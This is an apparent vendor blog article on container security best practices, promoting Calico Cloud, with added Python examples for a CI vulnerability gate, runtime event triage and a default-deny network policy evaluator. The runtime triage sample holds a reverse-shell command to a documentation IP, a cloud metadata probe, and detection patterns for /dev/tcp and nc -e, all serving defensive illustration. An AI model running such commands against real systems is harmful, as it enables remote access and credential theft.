Container environments are highly dynamic and require continuous monitoring, observability, and security. Since container security is a continuous practice, it should be fully integrated into the entire development and deployment cycle. Implementing security as an integral part of this cycle allows you to mitigate risk and reduce the number of vulnerabilities across the dynamic and complex attack surface containers present.
Let’s take a look at three best practices for ensuring containers remain secure during build, deployment, and runtime.
Securing container deployments
Securing containers during the build and deployment stages is primarily a vulnerability-management problem. Continuously scan software for vulnerabilities and misconfigurations before it is deployed, and block deployments that fail to meet your security requirements. Assess the images in your registries by scanning both first- and third-party images, using a tool that can cover multiple registries and cross-references findings against vulnerability databases such as the NVD. You also need to continuously check images, workloads, and infrastructure against common configuration security standards (e.g. CIS Benchmarks). This lets you meet internal and external compliance requirements, and quickly detect and remediate misconfigurations in your environment, closing off attack vectors before they can be used.
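The "block deployments that fail security requirements" step is where most teams need concrete rules, so here is an added example of a CI gate, written for this article and not code from the page or from Calico Cloud. It assumes a scanner report in a Trivy-like JSON shape (a list of Results, each with Vulnerabilities carrying VulnerabilityID, Severity and an optional FixedVersion); the sample report, its CVE ids and package names, and the gate policy are all constructed placeholders. The policy shows the edge cases a practitioner actually hits: an unfixable HIGH that should be reported but not block, and a waiver that must expire.

```python
"""CI/CD admission gate over an image vulnerability scan report.

Added example; not code from the page or from Calico Cloud. The report is constructed
here in a Trivy-like JSON shape (Results -> Vulnerabilities with VulnerabilityID,
Severity and FixedVersion); the CVE ids, package names and gate policy are placeholders.
"""
import json
from datetime import date

# Constructed sample report: placeholder ids, not real findings.
SAMPLE_REPORT = json.dumps({
    "ArtifactName": "registry.example.internal/payments/api:1.4.2",
    "Results": [{
        "Target": "registry.example.internal/payments/api:1.4.2 (debian 12)",
        "Vulnerabilities": [
            {"VulnerabilityID": "CVE-0000-0001", "PkgName": "libexample",
             "Severity": "CRITICAL", "FixedVersion": "1.2.3-2"},
            {"VulnerabilityID": "CVE-0000-0002", "PkgName": "libother",
             "Severity": "HIGH"},                       # no FixedVersion: unfixable today
            {"VulnerabilityID": "CVE-0000-0003", "PkgName": "libthird",
             "Severity": "MEDIUM", "FixedVersion": "4.0.1"},
        ],
    }],
})

# Hypothetical gate policy. CRITICAL always blocks. HIGH blocks only when a fix exists
# (an unfixable HIGH is surfaced but tolerated, otherwise every build fails and the gate
# gets bypassed). Any finding can be waived by an exception that must carry an expiry.
POLICY = {
    "block_severities": {"CRITICAL"},
    "block_if_fixable": {"HIGH"},
    "exceptions": {"CVE-0000-0001": "2030-01-01"},   # id -> last day the waiver is valid
}

def evaluate(report_json, today, policy=POLICY):
    """Apply the gate policy to a scan report as of `today` (YYYY-MM-DD) and return a verdict."""
    today = date.fromisoformat(today)
    report = json.loads(report_json)
    blocking, tolerated = [], []
    for result in report.get("Results", []):
        for v in result.get("Vulnerabilities") or []:
            vid = v["VulnerabilityID"]
            sev = v.get("Severity", "UNKNOWN").upper()
            fixable = bool(v.get("FixedVersion"))
            waiver = policy["exceptions"].get(vid)
            if waiver is not None and today <= date.fromisoformat(waiver):
                tolerated.append((vid, sev, f"waived until {waiver}"))
            elif sev in policy["block_severities"] or (sev in policy["block_if_fixable"] and fixable):
                if waiver is not None:
                    reason = "waiver expired"
                elif fixable:
                    reason = f"fix available: {v['FixedVersion']}"
                else:
                    reason = "severity"
                blocking.append((vid, sev, reason))
            else:
                tolerated.append((vid, sev, "no fix available" if not fixable else "below threshold"))
    return {"image": report.get("ArtifactName"), "allowed": not blocking,
            "blocking": blocking, "tolerated": tolerated}

def format_verdict(verdict):
    """Render the verdict the way a CI log would show it."""
    lines = [f'{verdict["image"]}: {"ALLOW" if verdict["allowed"] else "BLOCK"}']
    lines += [f"  BLOCK    {vid} {sev}: {why}" for vid, sev, why in verdict["blocking"]]
    lines += [f"  tolerate {vid} {sev}: {why}" for vid, sev, why in verdict["tolerated"]]
    return "\n".join(lines)

if __name__ == "__main__":
    # Same image, before and after the waiver on the CRITICAL finding runs out.
    print(format_verdict(evaluate(SAMPLE_REPORT, "2029-06-01")))
    print(format_verdict(evaluate(SAMPLE_REPORT, "2030-06-01")))
    # A gate is only useful if the pipeline honours its exit code.
    raise SystemExit(0 if evaluate(SAMPLE_REPORT, "2030-06-01")["allowed"] else 1)
```

Run as a pipeline step, the script passes the image while the waiver is valid and fails it the day the waiver lapses, which is the behaviour you want: exceptions are a dated decision, not a permanent hole in the gate.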
Securing containers at runtime
Containerized workloads require granular monitoring so that IT and security teams have visibility into the processes, files, and network connections of every workload running in the environment. Because containerized workloads are highly dynamic, an issue in one container can quickly propagate to other containers and applications, so it is critical to identify and contain each issue at its source.
To secure containers at runtime, monitor network traffic, file activity, process behavior, and system calls across your workloads and detect anomalies in them; together these give broad visibility into runtime threats. Match workload activity against indicators of compromise (IoCs) and indicators of attack (IoAs) for known malicious activity, and complement that with a behavioral approach, typically a machine-learned baseline of normal activity, so that previously unseen (zero-day) attacks surface as deviations from the baseline. Use a tool that lets you define security policies to block or quarantine compromised workloads automatically, in addition to sending alerts to your security operations center for further analysis.
You also need visibility across the stack from the network layer to the application layer, so use a tool that gives a runtime view of the workloads in your environment with context on how they are operating and communicating. This will allow for faster troubleshooting of performance hotspots and connectivity issues.
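As an added example of the runtime detection described above (written for this article; it is not Calico Cloud's detection engine), the following triages process-exec events against both a behavioral baseline and a small set of IoA patterns, and turns the findings into the block/quarantine/alert decisions the text mentions. The event format, the per-image baseline, the pod and image names, and the IoA regexes are all constructed for illustration.

```python
"""Runtime triage of process-exec events against a behavioral baseline and IoA patterns.

Added example; not Calico Cloud's detection engine. The events, the baseline, and the
IoA patterns are all constructed here for illustration.
"""
import json
import re

# Constructed JSON-lines events in a hypothetical shape: one process exec per line.
SAMPLE_EVENTS = """\
{"ts": 1, "pod": "web-7d9f-abc", "image": "nginx:1.25", "parent": "nginx", "comm": "nginx", "args": "nginx: worker process"}
{"ts": 2, "pod": "web-7d9f-abc", "image": "nginx:1.25", "parent": "nginx", "comm": "sh", "args": "sh -c id"}
{"ts": 3, "pod": "web-7d9f-abc", "image": "nginx:1.25", "parent": "sh", "comm": "bash", "args": "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"}
{"ts": 4, "pod": "api-55c-xyz", "image": "payments/api:1.4.2", "parent": "tini", "comm": "python3", "args": "python3 -m app"}
{"ts": 5, "pod": "api-55c-xyz", "image": "payments/api:1.4.2", "parent": "python3", "comm": "curl", "args": "curl -s http://169.254.169.254/latest/meta-data/"}
{"ts": 6, "pod": "worker-1", "image": "payments/api:1.4.2", "parent": "python3", "comm": "pg_dump", "args": "pg_dump -h db orders"}
"""

# Hypothetical learned baseline: (parent, child) process pairs observed during normal
# operation of each image. A real system would learn this over a training window.
BASELINE = {
    "nginx:1.25": {("nginx", "nginx")},
    "payments/api:1.4.2": {("tini", "python3")},
}

# Illustrative indicators of attack, matched on the command line regardless of baseline.
IOA_PATTERNS = [
    ("reverse_shell", re.compile(r"/dev/tcp/|\bnc\b.*\s-e\b|\bncat\b.*\s-e\b")),
    ("cloud_metadata_probe", re.compile(r"169\.254\.169\.254")),
]

SHELLS = {"sh", "bash", "dash", "ash", "zsh"}
ACTION_RANK = {"alert": 1, "quarantine": 2}

def triage(events_jsonl, baseline=BASELINE, ioa_patterns=IOA_PATTERNS):
    """Return one finding per suspicious event, with its reasons and the strongest action."""
    findings = []
    for line in events_jsonl.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        reasons = []
        for name, pattern in ioa_patterns:
            if pattern.search(e["args"]):
                reasons.append(("ioa:" + name, "quarantine"))
        if (e["parent"], e["comm"]) not in baseline.get(e["image"], set()):
            # A shell spawned by a non-shell process (e.g. a web server) is the classic
            # post-exploitation signature, so it is quarantined rather than merely alerted on;
            # any other unknown process pair is an alert for an analyst to look at.
            interactive = e["comm"] in SHELLS and e["parent"] not in SHELLS
            reasons.append(("baseline_deviation", "quarantine" if interactive else "alert"))
        if reasons:
            findings.append({
                "ts": e["ts"], "pod": e["pod"], "image": e["image"],
                "process": f'{e["parent"]} -> {e["comm"]}', "args": e["args"],
                "reasons": [r for r, _ in reasons],
                "action": max((a for _, a in reasons), key=ACTION_RANK.__getitem__),
            })
    return findings

def pod_actions(findings):
    """Collapse findings to the most severe action per pod: what the policy engine should do."""
    actions = {}
    for f in findings:
        if f["pod"] not in actions or ACTION_RANK[f["action"]] > ACTION_RANK[actions[f["pod"]]]:
            actions[f["pod"]] = f["action"]
    return actions

if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for f in found:
        print(f'{f["ts"]:>3} {f["pod"]:<14} {f["action"]:<10} {",".join(f["reasons"])}  {f["process"]}: {f["args"]}')
    print(pod_actions(found))
```

Note that the first suspicious event in the nginx pod (a shell spawned by the server) is caught by the baseline alone, before the reverse shell in the next event matches any signature; that is the point of pairing behavioral detection with IoCs and IoAs.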
Reducing the attack surface of containers
Because cloud environments contain a large number of containers built from many different underlying images, each of which can carry vulnerabilities, containers present a large attack surface. To reduce it, focus on threat prevention using a zero-trust approach: deny all traffic by default and explicitly allow only what each workload needs. Implement granular, zero-trust workload access controls that govern the flow of data between workloads and to external resources. Examples of such controls include:
- DNS-based (domain name) policies for fine-grained egress control to destinations that have no stable IP address
- Integration with existing network firewalls
- Using IP subnet/CIDR ranges in security policies (i.e. limiting ranges for egress and ingress traffic to/from workloads)
Microsegmentation can be used to isolate workloads based on environment, application tier, compliance needs, user access, and individual workload requirements. Dividing workloads into distinct security segments lets you define granular security controls for each segment. Microsegmentation is essential to reducing the container attack surface because it isolates endpoints, so that a compromised workload cannot reach anything outside its segment, and thereby limits lateral movement.
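To make the default-deny model and the access-control examples above concrete, here is an added policy evaluator written for this article; it is not Calico's policy engine or data path. The policy objects are only loosely shaped after a Calico NetworkPolicy (a label selector plus ordered Allow/Deny rules with selector, CIDR or domain destinations), and the workload names, labels, IPs, CIDRs and domain are constructed placeholders. It applies the source's egress rules and the destination's ingress rules, denies anything no rule matches, and shows first-match-wins ordering with an explicit Deny ahead of a CIDR Allow.

```python
"""Zero-trust (default-deny) workload policy evaluation for east-west and egress flows.

Added example; not Calico's policy engine. Policy objects are constructed here and only
loosely shaped after Calico NetworkPolicy; all names, labels, IPs and CIDRs are placeholders.
"""
import ipaddress

WORKLOADS = {
    "frontend": {"labels": {"app": "frontend", "tier": "web"}, "ip": "10.0.1.1"},
    "backend":  {"labels": {"app": "backend", "tier": "app"}, "ip": "10.0.1.2"},
    "db":       {"labels": {"app": "db", "tier": "data"}, "ip": "10.0.1.3"},
    "kube-dns": {"labels": {"k8s-app": "kube-dns"}, "ip": "10.0.0.10"},
}

# Each policy selects workloads by label and carries ordered rules for one direction.
# Anything not explicitly allowed is denied (the zero-trust baseline the article describes).
POLICIES = [
    {"name": "frontend-egress", "order": 100, "selector": {"app": "frontend"}, "types": ["Egress"],
     "egress": [{"action": "Allow", "protocol": "TCP", "destination": {"selector": {"app": "backend"}}, "ports": [8080]}]},
    {"name": "backend-ingress", "order": 100, "selector": {"app": "backend"}, "types": ["Ingress"],
     "ingress": [{"action": "Allow", "protocol": "TCP", "source": {"selector": {"app": "frontend"}}, "ports": [8080]}]},
    {"name": "backend-egress", "order": 100, "selector": {"app": "backend"}, "types": ["Egress"],
     "egress": [
         {"action": "Allow", "protocol": "UDP", "destination": {"selector": {"k8s-app": "kube-dns"}}, "ports": [53]},
         {"action": "Allow", "protocol": "TCP", "destination": {"selector": {"app": "db"}}, "ports": [5432]},
         # Explicit deny ahead of the CIDR allow: first match wins, so 10.20.0.250 stays unreachable.
         {"action": "Deny",  "protocol": "TCP", "destination": {"nets": ["10.20.0.250/32"]}},
         {"action": "Allow", "protocol": "TCP", "destination": {"nets": ["10.20.0.0/24"]}, "ports": [443]},
         # DNS-based rule for an external service whose IP is not stable.
         {"action": "Allow", "protocol": "TCP", "destination": {"domains": ["api.payments.example"]}, "ports": [443]},
     ]},
    {"name": "db-ingress", "order": 100, "selector": {"app": "db"}, "types": ["Ingress"],
     "ingress": [{"action": "Allow", "protocol": "TCP", "source": {"selector": {"app": "backend"}}, "ports": [5432]}]},
    {"name": "dns-ingress", "order": 100, "selector": {"k8s-app": "kube-dns"}, "types": ["Ingress"],
     "ingress": [{"action": "Allow", "protocol": "UDP", "source": {}, "ports": [53]}]},
]

def _selector_matches(selector, labels):
    """All selector labels must be present with equal values; external peers have no labels."""
    return labels is not None and all(labels.get(k) == v for k, v in selector.items())

def _endpoint_matches(spec, peer):
    """Match a rule's source/destination spec against a peer {labels, ip, domain}."""
    if "selector" in spec:
        return _selector_matches(spec["selector"], peer.get("labels"))
    if "nets" in spec:
        ip = ipaddress.ip_address(peer["ip"])
        return any(ip in ipaddress.ip_network(n) for n in spec["nets"])
    if "domains" in spec:
        return peer.get("domain") in spec["domains"]
    return True  # empty spec matches any peer

def _rules_verdict(policies, endpoint_labels, direction, peer, protocol, port):
    """Walk the policies that select this endpoint in order; first matching rule decides."""
    peer_key = "source" if direction == "Ingress" else "destination"
    for pol in sorted(policies, key=lambda p: p.get("order", 1000)):
        if direction not in pol.get("types", []) or not _selector_matches(pol["selector"], endpoint_labels):
            continue
        for rule in pol.get(direction.lower(), []):
            if rule.get("protocol", protocol) != protocol:
                continue
            if "ports" in rule and port not in rule["ports"]:
                continue
            if not _endpoint_matches(rule.get(peer_key, {}), peer):
                continue
            return rule["action"]
    return "Deny"  # zero trust: no rule matched, so the flow is denied

def flow_allowed(policies, workloads, src, dst, protocol, port, domain=None):
    """A flow passes only if the source's egress AND (for in-cluster peers) the destination's ingress allow it."""
    src_peer = {"labels": workloads[src]["labels"], "ip": workloads[src]["ip"]}
    if dst in workloads:
        dst_peer = {"labels": workloads[dst]["labels"], "ip": workloads[dst]["ip"], "domain": domain}
    else:
        dst_peer = {"labels": None, "ip": dst, "domain": domain}  # external destination
    if _rules_verdict(policies, src_peer["labels"], "Egress", dst_peer, protocol, port) != "Allow":
        return False
    if dst_peer["labels"] is None:
        return True
    return _rules_verdict(policies, dst_peer["labels"], "Ingress", src_peer, protocol, port) == "Allow"

if __name__ == "__main__":
    for args in [("frontend", "backend", "TCP", 8080), ("frontend", "db", "TCP", 5432),
                 ("backend", "db", "TCP", 5432), ("backend", "10.20.0.7", "TCP", 443),
                 ("backend", "10.20.0.250", "TCP", 443), ("backend", "198.51.100.7", "TCP", 443)]:
        print(args, "ALLOW" if flow_allowed(POLICIES, WORKLOADS, *args) else "DENY")
    print("dns-based:", flow_allowed(POLICIES, WORKLOADS, "backend", "198.51.100.7", "TCP", 443,
                                     domain="api.payments.example"))
```

Two things worth noticing when running it: the frontend cannot reach the database even though nothing explicitly denies it, because under default deny the absence of a rule is the deny; and the same external IP is denied or allowed depending only on whether the flow was resolved from an allowed domain name, which is exactly what DNS-based egress policy buys you.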
It is also worth remembering that, unlike long-lived servers, containers are designed to be ephemeral and lightweight. Keep images minimal, with only the binaries and files the workload needs, since every extra package is more code to patch and more for an attacker to use; do not patch running containers in place, but rebuild images from updated base images and redeploy them on a regular cadence. Regularly maintained, minimal images reduce the attack surface and keep your security posture from drifting.
Continuous monitoring, observability, and security
While containers offer many advantages, they pose just as many security challenges. Because container images are immutable (each change to the application or microservice means building a new image and launching new containers from it), containerized environments are highly dynamic, with workloads constantly being replaced. It is therefore extremely important that all components are secured from the initial development phase through to the end of their lifecycle.
The best practices suggested in this article build the continuous monitoring, observability, and security of containers around three main pillars:
- Robust build-time and deployment security
- Runtime detection of known and zero-day threats
- Zero trust workload security to reduce the attack surface
Architecting your container security in this way will help you build and maintain a strong cloud security posture.
Calico Cloud provides zero-trust based security for containers during build, deployment, and runtime. Try Calico Cloud with a free trial.